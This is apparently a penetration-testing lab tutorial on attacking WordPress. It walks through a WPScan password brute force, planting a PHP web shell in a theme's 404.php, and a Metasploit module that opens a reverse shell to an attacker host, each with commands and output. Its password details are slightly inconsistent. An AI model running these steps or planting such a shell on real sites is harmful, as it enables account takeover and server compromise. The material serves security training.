Skip to main content

​
Attacking WordPress Users

​
WordPress User Bruteforce

WPScan can be used to brute force usernames and passwords. The scan report returned three users registered on the website: admin, roger, and david. The tool uses two kinds of login brute force attacks, xmlrpc and wp-login. The wp-login method will attempt to brute force the normal WordPress login page, while the xmlrpc method uses the WordPress API to make login attempts through /xmlrpc.php. The xmlrpc method is preferred as it is faster.
WPScan - XMLRPC
Dudji@htb[/htb]$ wpscan --password-attack xmlrpc -t 20 -U admin,david -P passwords.txt --url http://blog.inlanefreight.com

[+] URL: http://blog.inlanefreight.com/
[+] Started: Thu Apr  9 13:37:36 2020
[+] Performing password attack on Xmlrpc against 3 user/s

[SUCCESS] - admin / sunshine1
Trying david / Spring2016 Time: 00:00:01 <============> (474 / 474) 100.00% Time: 00:00:01

[i] Valid Combinations Found:
 | Username: admin, Password: sunshine1

​
Remote Code Execution (RCE) via the Theme Editor

​
Attacking the WordPress Backend

With administrative access to WordPress, we can modify the PHP source code to execute system commands. To perform this attack, log in to WordPress with administrator credentials, which should redirect us to the admin panel. Click on Appearance in the side panel and select Theme Editor. This page allows us to edit PHP source code directly. Select an inactive theme to avoid corrupting the main theme. WordPress Theme Editor view In this example, the active theme is Transportex, so an unused theme such as Twenty Seventeen should be selected instead. Selecting an inactive WordPress theme Choose the inactive theme and click Select. Next, choose a non-critical file such as 404.php, then add a web shell.
Twenty Seventeen Theme - 404.php
<?php

system($_GET['cmd']);

/**
 * The template for displaying 404 pages (not found)
 *
 * @link https://codex.wordpress.org/Creating_an_Error_404_Page
<SNIP>
The code above executes operating system commands through the GET parameter cmd. In this example, we modified 404.php and introduced the system() function. Command execution can then be triggered by appending the cmd parameter to the URL, for example: 404.php?cmd=id. We can validate code execution by browsing to that URL directly or by issuing the following cURL request.
RCE
Dudji@htb[/htb]$ curl -X GET "http://<target>/wp-content/themes/twentyseventeen/404.php?cmd=id"

uid=1000(wp-user) gid=1000(wp-user) groups=1000(wp-user)
<SNIP>

​
Attacking WordPress with Metasploit

​
Automating WordPress Exploitation

We can use the Metasploit Framework (MSF) to obtain a reverse shell on the target automatically. This requires valid credentials for an account that has sufficient rights to create files on the webserver. To obtain the reverse shell, we can use the wp_admin_shell_upload module. We can easily search for it inside MSF:
MSF Search
msf5 > search wp_admin

Matching Modules
================

#  Name                                       Disclosure Date  Rank       Check  Description
-  ----                                       ---------------  ----       -----  -----------
0  exploit/unix/webapp/wp_admin_shell_upload  2015-02-21       excellent  Yes    WordPress Admin Shell Upload
The number 0 in the search results represents the ID for the suggested module. From here, we can specify the module by its ID number to save time.
Module Selection
msf5 > use 0

msf5 exploit(unix/webapp/wp_admin_shell_upload) >

​
Exploitation

After using the set command to configure the required options, use run to execute the module. If all parameters are correct, it should spawn a reverse shell on the target.
Set Options
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts blog.inlanefreight.com
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username admin
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password Winter2020
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set lhost 10.10.16.8
msf5 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.10.16.8:4444
[*] Authenticating with WordPress using admin:Winter2020...
[+] Authenticated with WordPress
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/YtyZGFIhax/uTvAAKrAdp.php...
[*] Sending stage (38247 bytes) to blog.inlanefreight.com
[*] Meterpreter session 1 opened
[+] Deleted uTvAAKrAdp.php

meterpreter > getuid
Server username: www-data (33)